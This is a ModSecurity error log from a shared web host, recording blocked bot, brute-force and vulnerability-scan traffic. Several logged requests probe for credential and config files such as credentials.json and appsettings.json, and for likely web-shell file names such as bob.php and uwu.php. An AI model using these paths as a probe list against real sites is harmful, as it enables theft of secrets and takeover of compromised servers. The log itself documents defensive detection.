[Tue May 26 18:46:00.658813 2026] [security2:error] [pid 1025417:tid 1025661] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWdEFHbArxonFeMXvQZ3wAAAHI"]
[Tue May 26 18:46:00.690951 2026] [security2:error] [pid 1025417:tid 1025606] [client 142.44.233.135:48996] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.ivwellnessresources.org"] [uri "/"] [unique_id "ahWdEFHbArxonFeMXvQZ4AAAADs"]
[Tue May 26 18:46:00.691034 2026] [security2:error] [pid 1025417:tid 1025606] [client 142.44.233.135:48996] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ivwellnessresources.org"] [uri "/"] [unique_id "ahWdEFHbArxonFeMXvQZ4AAAADs"]
[Tue May 26 18:46:00.845412 2026] [security2:error] [pid 1025417:tid 1025539] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/settings.yml"] [unique_id "ahWdEFHbArxonFeMXvQZ4gAAfXk"]
[Tue May 26 18:46:00.865596 2026] [security2:error] [pid 1025417:tid 1025594] [client 157.7.188.122:53846] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/"] [unique_id "ahWdEFHbArxonFeMXvQZ1gAAAC8"]
[Tue May 26 18:46:00.936739 2026] [security2:error] [pid 1025417:tid 1025549] [client 4.204.220.190:22436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/.well-known/about.php"] [unique_id "ahWdEFHbArxonFeMXvQZ4wAAAAI"]
[Tue May 26 18:46:00.936843 2026] [security2:error] [pid 1025417:tid 1025549] [client 4.204.220.190:22436] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/.well-known/about.php"] [unique_id "ahWdEFHbArxonFeMXvQZ4wAAAAI"]
[Tue May 26 18:46:01.026337 2026] [security2:error] [pid 1025417:tid 1025608] [client 157.7.188.122:53842] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/"] [unique_id "ahWdEFHbArxonFeMXvQZ0wAAAGc"]
[Tue May 26 18:46:01.029234 2026] [security2:error] [pid 1025417:tid 1025622] [client 157.7.188.122:53844] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/"] [unique_id "ahWdEFHbArxonFeMXvQZ2AAAAGU"]
[Tue May 26 18:46:01.036040 2026] [security2:error] [pid 1025417:tid 1025561] [client 162.243.41.33:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.41.243.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/xmlrpc.php"] [unique_id "ahWdEFHbArxonFeMXvQZ4QAAAA4"]
[Tue May 26 18:46:01.393424 2026] [security2:error] [pid 1025417:tid 1025630] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWdEVHbArxonFeMXvQZ9QAAAFM"]
[Tue May 26 18:46:01.491842 2026] [security2:error] [pid 1025417:tid 1025656] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWdEVHbArxonFeMXvQZ-QAAAG0"]
[Tue May 26 18:46:01.588991 2026] [security2:error] [pid 1025417:tid 1025619] [client 4.204.220.190:22433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWdEVHbArxonFeMXvQaAAAAAEg"]
[Tue May 26 18:46:01.589124 2026] [security2:error] [pid 1025417:tid 1025619] [client 4.204.220.190:22433] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWdEVHbArxonFeMXvQaAAAAAEg"]
[Tue May 26 18:46:01.633753 2026] [security2:error] [pid 1025417:tid 1025609] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWdEVHbArxonFeMXvQaAQAAAD4"]
[Tue May 26 18:46:01.707804 2026] [security2:error] [pid 1025417:tid 1025541] [remote 121.200.216.55:55612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWdEVHbArxonFeMXvQaAgAAI3s"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:46:01.740942 2026] [security2:error] [pid 1025417:tid 1025666] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdEVHbArxonFeMXvQZ8AAAAHc"]
[Tue May 26 18:46:01.773206 2026] [security2:error] [pid 1025417:tid 1025621] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWdEVHbArxonFeMXvQaAwAAAEo"]
[Tue May 26 18:46:01.938186 2026] [security2:error] [pid 1025417:tid 1025651] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWdEVHbArxonFeMXvQaCgAAAGg"]
[Tue May 26 18:46:01.996149 2026] [security2:error] [pid 1025417:tid 1025620] [client 4.204.220.190:27320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/bob.php"] [unique_id "ahWdEVHbArxonFeMXvQaDAAAAEk"]
[Tue May 26 18:46:01.996337 2026] [security2:error] [pid 1025417:tid 1025620] [client 4.204.220.190:27320] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/bob.php"] [unique_id "ahWdEVHbArxonFeMXvQaDAAAAEk"]
[Tue May 26 18:46:02.077901 2026] [security2:error] [pid 1025417:tid 1025591] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWdElHbArxonFeMXvQaDQAAACw"]
[Tue May 26 18:46:02.236066 2026] [security2:error] [pid 1025417:tid 1025654] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWdElHbArxonFeMXvQaEQAAAGs"]
[Tue May 26 18:46:02.381253 2026] [security2:error] [pid 1025417:tid 1025671] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWdElHbArxonFeMXvQaEgAAAHw"]
[Tue May 26 18:46:02.511437 2026] [security2:error] [pid 1025417:tid 1025644] [client 172.255.83.134:56436] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWdElHbArxonFeMXvQaEwAAAGE"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 18:46:02.522590 2026] [security2:error] [pid 1025417:tid 1025650] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWdElHbArxonFeMXvQaGAAAAGc"]
[Tue May 26 18:46:02.540694 2026] [security2:error] [pid 1025417:tid 1025580] [client 4.204.220.190:28417] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/t3s.php"] [unique_id "ahWdElHbArxonFeMXvQaHAAAACE"]
[Tue May 26 18:46:02.540805 2026] [security2:error] [pid 1025417:tid 1025580] [client 4.204.220.190:28417] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/t3s.php"] [unique_id "ahWdElHbArxonFeMXvQaHAAAACE"]
[Tue May 26 18:46:02.580416 2026] [security2:error] [pid 1025417:tid 1025545] [remote 18.190.7.192:50462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWdElHbArxonFeMXvQaFAAAQH8"]
[Tue May 26 18:46:02.662761 2026] [security2:error] [pid 1025417:tid 1025561] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWdElHbArxonFeMXvQaHwAAAA4"]
[Tue May 26 18:46:02.777088 2026] [security2:error] [pid 1025417:tid 1025427] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/appsettings.json"] [unique_id "ahWdElHbArxonFeMXvQaKgAAQwk"]
[Tue May 26 18:46:02.807900 2026] [security2:error] [pid 1025417:tid 1025564] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWdElHbArxonFeMXvQaKwAAABE"]
[Tue May 26 18:46:02.946132 2026] [security2:error] [pid 1025417:tid 1025630] [client 162.243.41.33:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stockmarketanalysis.in"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWdElHbArxonFeMXvQaLQAAAFM"]
[Tue May 26 18:46:03.121183 2026] [proxy:warn] [pid 1025417:tid 1025555] [client 66.132.172.136:40882] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 18:46:03.121240 2026] [proxy:error] [pid 1025417:tid 1025555] (70014)End of file found: [client 66.132.172.136:40882] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 66.132.172.136 ()
[Tue May 26 18:46:03.148844 2026] [security2:error] [pid 1025417:tid 1025429] [remote 18.190.7.192:50462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWdE1HbArxonFeMXvQaMQAAAws"], referer: https://christinaspromotions.com/wp-login.php
[Tue May 26 18:46:03.212137 2026] [security2:error] [pid 1025417:tid 1025430] [remote 57.141.2.40:44739] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 40.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWdE1HbArxonFeMXvQaMAAASAw"]
[Tue May 26 18:46:03.699049 2026] [security2:error] [pid 1025417:tid 1025598] [client 4.204.220.190:28464] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-admin/css/"] [unique_id "ahWdE1HbArxonFeMXvQaSwAAADM"]
[Tue May 26 18:46:03.923541 2026] [security2:error] [pid 1025417:tid 1025611] [client 4.204.220.190:34280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.sevenstar.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWdE1HbArxonFeMXvQaVAAAAEA"]
[Tue May 26 18:46:03.999538 2026] [security2:error] [pid 1025417:tid 1025601] [client 4.204.220.190:28464] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.sevenstar.onesoft.in"] [uri "/x/"] [unique_id "ahWdE1HbArxonFeMXvQaVgAAADY"]
[Tue May 26 18:46:04.080541 2026] [security2:error] [pid 1025417:tid 1025549] [client 4.204.220.190:34280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.sevenstar.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWdFFHbArxonFeMXvQaWQAAAAI"]
[Tue May 26 18:46:04.133491 2026] [security2:error] [pid 1025417:tid 1025641] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdE1HbArxonFeMXvQaTwAAAF4"]
[Tue May 26 18:46:04.156538 2026] [security2:error] [pid 1025417:tid 1025573] [client 4.204.220.190:28464] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-admin/css/colors/modern/"] [unique_id "ahWdFFHbArxonFeMXvQaWgAAABo"]
[Tue May 26 18:46:04.446430 2026] [security2:error] [pid 1025417:tid 1025610] [client 4.204.220.190:34280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.sevenstar.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWdFFHbArxonFeMXvQaaAAAAD8"]
[Tue May 26 18:46:04.537330 2026] [security2:error] [pid 1025417:tid 1025643] [client 4.204.220.190:28464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/uwu.php"] [unique_id "ahWdFFHbArxonFeMXvQaaQAAAGA"]
[Tue May 26 18:46:04.537464 2026] [security2:error] [pid 1025417:tid 1025643] [client 4.204.220.190:28464] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/uwu.php"] [unique_id "ahWdFFHbArxonFeMXvQaaQAAAGA"]
[Tue May 26 18:46:04.688031 2026] [security2:error] [pid 1025417:tid 1025445] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/assets/credentials.json"] [unique_id "ahWdFFHbArxonFeMXvQabwAAARs"]
[Tue May 26 18:46:05.031135 2026] [security2:error] [pid 1025417:tid 1025591] [client 4.204.220.190:32404] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/uwa.php"] [unique_id "ahWdFVHbArxonFeMXvQagAAAACw"]
[Tue May 26 18:46:05.031241 2026] [security2:error] [pid 1025417:tid 1025591] [client 4.204.220.190:32404] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/uwa.php"] [unique_id "ahWdFVHbArxonFeMXvQagAAAACw"]
[Tue May 26 18:46:05.340609 2026] [security2:error] [pid 1025417:tid 1025653] [client 4.204.220.190:26806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/crgio.php"] [unique_id "ahWdFVHbArxonFeMXvQahwAAAGo"]
[Tue May 26 18:46:05.340731 2026] [security2:error] [pid 1025417:tid 1025653] [client 4.204.220.190:26806] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/crgio.php"] [unique_id "ahWdFVHbArxonFeMXvQahwAAAGo"]
[Tue May 26 18:46:05.767162 2026] [security2:error] [pid 1025417:tid 1025638] [client 4.204.220.190:16687] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/geforce.php"] [unique_id "ahWdFVHbArxonFeMXvQakwAAAFs"]
[Tue May 26 18:46:05.767274 2026] [security2:error] [pid 1025417:tid 1025638] [client 4.204.220.190:16687] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/geforce.php"] [unique_id "ahWdFVHbArxonFeMXvQakwAAAFs"]
[Tue May 26 18:46:06.474218 2026] [security2:error] [pid 1025417:tid 1025567] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWdFlHbArxonFeMXvQanwAAABQ"]
[Tue May 26 18:46:06.658730 2026] [security2:error] [pid 1025417:tid 1025446] [remote 178.128.111.105:59294] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/config/production.json"] [unique_id "ahWdFlHbArxonFeMXvQarAAAIBw"]
[Tue May 26 18:46:06.665548 2026] [security2:error] [pid 1025417:tid 1025656] [client 4.204.220.190:46555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/pucci.php"] [unique_id "ahWdFlHbArxonFeMXvQarQAAAG0"]
[Tue May 26 18:46:06.665647 2026] [security2:error] [pid 1025417:tid 1025656] [client 4.204.220.190:46555] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.sevenstar.onesoft.in"] [uri "/pucci.php"] [unique_id "ahWdFlHbArxonFeMXvQarQAAAG0"]
[Tue May 26 18:46:06.999452 2026] [security2:error] [pid 1025417:tid 1025621] [client 4.204.220.190:26760] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-includes/blocks/details/"] [unique_id "ahWdFlHbArxonFeMXvQaugAAAEo"]
[Tue May 26 18:46:07.073546 2026] [security2:error] [pid 1025417:tid 1025606] [client 4.204.220.190:34280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.sevenstar.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWdF1HbArxonFeMXvQavQAAADs"]
[Tue May 26 18:46:07.945770 2026] [security2:error] [pid 1025417:tid 1025659] [client 114.119.145.154:31899] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "worldwidecourier.co.in"] [uri "/category/dating-tips"] [unique_id "ahWdF1HbArxonFeMXvQa1AAAAHA"], referer: https://worldwidecourier.co.in/category/dating-tips
[Tue May 26 18:46:08.010554 2026] [security2:error] [pid 1025417:tid 1025585] [client 4.204.220.190:26760] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.sevenstar.onesoft.in"] [uri "/wp-includes/blocks/audio/"] [unique_id "ahWdGFHbArxonFeMXvQa2AAAACY"]
[Tue May 26 18:46:08.118787 2026] [security2:error] [pid 1025417:tid 1025596] [client 4.204.220.190:34280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.sevenstar.onesoft.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWdGFHbArxonFeMXvQa3wAAADE"]
[Tue May 26 18:46:08.190213 2026] [security2:error] [pid 1025417:tid 1025583] [client 4.204.220.190:26760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/one.php"] [unique_id "ahWdGFHbArxonFeMXvQa4wAAACQ"]
